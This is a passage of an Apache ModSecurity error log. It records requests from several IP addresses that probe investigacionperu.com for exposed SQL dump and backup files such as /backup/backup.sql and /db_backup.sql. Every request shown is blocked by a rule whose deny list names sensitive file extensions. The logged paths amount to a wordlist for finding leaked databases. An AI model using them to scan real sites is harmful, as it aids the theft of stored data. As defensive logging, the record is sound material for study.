"Zoqw9DbJWLg2ecbngu9HuQAAAII"] [Sun Jul 07 10:15:02.339386 2024] [:error] [pid 30828:tid 139722517042944] [client 23.154.177.24:33090] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sqldump.sql"] [unique_id "Zoqw9jbJWLg2ecbngu9HugAAAJI"] [Sun Jul 07 10:15:02.855684 2024] [:error] [pid 30828:tid 139722626148096] [client 23.154.177.24:33092] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/dump.sql"] [unique_id "Zoqw9jbJWLg2ecbngu9HuwAAAIU"] [Sun Jul 07 10:15:03.550413 2024] [:error] [pid 30828:tid 139722592577280] [client 23.154.177.24:33094] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-stigacionperu.sql"] [unique_id "Zoqw9zbJWLg2ecbngu9HvAAAAIk"] [Sun Jul 07 10:15:04.380901 2024] [:error] [pid 30828:tid 139722466686720] [client 192.42.116.181:33096] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/onperu_2023.sql"] [unique_id "Zoqw-DbJWLg2ecbngu9HvQAAAJg"] [Sun Jul 07 10:15:05.422879 2024] [:error] [pid 30827:tid 139722483472128] [client 192.42.116.181:33098] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup/backup.sql"] [unique_id "Zoqw-UGuaLybMBNkB61tSQAAAFY"] [Sun Jul 07 10:15:06.482459 2024] [:error] [pid 30826:tid 139722500257536] [client 192.42.116.181:33100] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vestigacionperu_2023.sql"] [unique_id "Zoqw-vcO2IzqYGkif72oUAAAABQ"] [Sun Jul 07 10:15:07.614407 2024] [:error] [pid 30826:tid 139722542221056] [client 192.42.116.181:33102] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/estigacionperu_2023.sql"] [unique_id "Zoqw-_cO2IzqYGkif72oUQAAAA8"] [Sun Jul 07 10:15:08.775879 2024] [:error] [pid 30826:tid 139722668111616] [client 192.42.116.181:33104] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2021.sql"] [unique_id "Zoqw_PcO2IzqYGkif72oUgAAAAA"] [Sun Jul 07 10:15:09.712099 2024] [:error] [pid 30826:tid 139722508650240] [client 192.42.116.181:33106] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_estigacionperu.sql"] [unique_id "Zoqw_fcO2IzqYGkif72oUwAAABM"] [Sun Jul 07 10:15:10.587765 2024] [:error] [pid 30827:tid 139722542221056] [client 192.42.116.181:33108] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-ru.sql"] [unique_id "Zoqw_kGuaLybMBNkB61tSgAAAE8"] [Sun Jul 07 10:15:12.325462 2024] [:error] [pid 30828:tid 139722575791872] [client 192.42.116.181:33110] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nvestigacionperu-2022.sql"] [unique_id "ZoqxADbJWLg2ecbngu9HvgAAAIs"] [Sun Jul 07 10:15:13.062798 2024] [:error] [pid 30828:tid 139722659718912] [client 192.42.116.181:33112] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup-2023.sql"] [unique_id "ZoqxATbJWLg2ecbngu9HvwAAAIE"] [Sun Jul 07 10:15:13.970360 2024] [:error] [pid 31926:tid 139722634540800] [client 192.42.116.181:33114] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ru-2023.sql"] [unique_id "ZoqxAXug2jzbr_AlO3dxngAAAMQ"] [Sun Jul 07 10:15:14.841946 2024] [:error] [pid 31926:tid 139722584184576] [client 185.241.208.115:33116] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nvestigacionperu_2023.sql"] [unique_id "ZoqxAnug2jzbr_AlO3dxnwAAAMo"] [Sun Jul 07 10:15:16.052928 2024] [:error] [pid 30828:tid 139722567399168] [client 185.241.208.115:33118] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/peru_2023.sql"] [unique_id "ZoqxBDbJWLg2ecbngu9HwAAAAIw"] [Sun Jul 07 10:15:17.111397 2024] [:error] [pid 31926:tid 139722491864832] [client 185.241.208.115:33126] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-acionperu.sql"] [unique_id "ZoqxBXug2jzbr_AlO3dxoQAAANU"] [Sun Jul 07 10:15:18.164341 2024] [:error] [pid 30827:tid 139722626148096] [client 185.241.208.115:33128] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db_backup.sql"] [unique_id "ZoqxBkGuaLybMBNkB61tSwAAAEU"] [Sun Jul 07 10:15:19.228254 2024] [:error] [pid 30826:tid 139722559006464] [client 185.241.208.115:33130] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu_2023.sql"] [unique_id "ZoqxB_cO2IzqYGkif72oVAAAAA0"] [Sun Jul 07 10:15:20.685021 2024] [:error] [pid 30828:tid 139722634540800] [client 185.241.208.115:33132] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/peru-2022.sql"] [unique_id "ZoqxCDbJWLg2ecbngu9HwgAAAIQ"] [Sun Jul 07 10:15:21.673290 2024] [:error] [pid 31926:tid 139722542221056] [client 185.241.208.115:33134] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/test.sql"] [unique_id "ZoqxCXug2jzbr_AlO3dxogAAAM8"] [Sun Jul 07 10:15:22.662996 2024] [:error] [pid 31926:tid 139722508650240] [client 185.241.208.115:33136] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-onperu.sql"] [unique_id "ZoqxCnug2jzbr_AlO3dxowAAANM"] [Sun Jul 07 10:15:23.614015 2024] [:error] [pid 31926:tid 139722517042944] [client 185.241.208.115:33138] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sql_dump_file.sql"] [unique_id "ZoqxC3ug2jzbr_AlO3dxpAAAANI"] [Sun Jul 07 10:15:24.600597 2024] [:error] [pid 31926:tid 139722500257536] [client 185.241.208.115:33140] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id 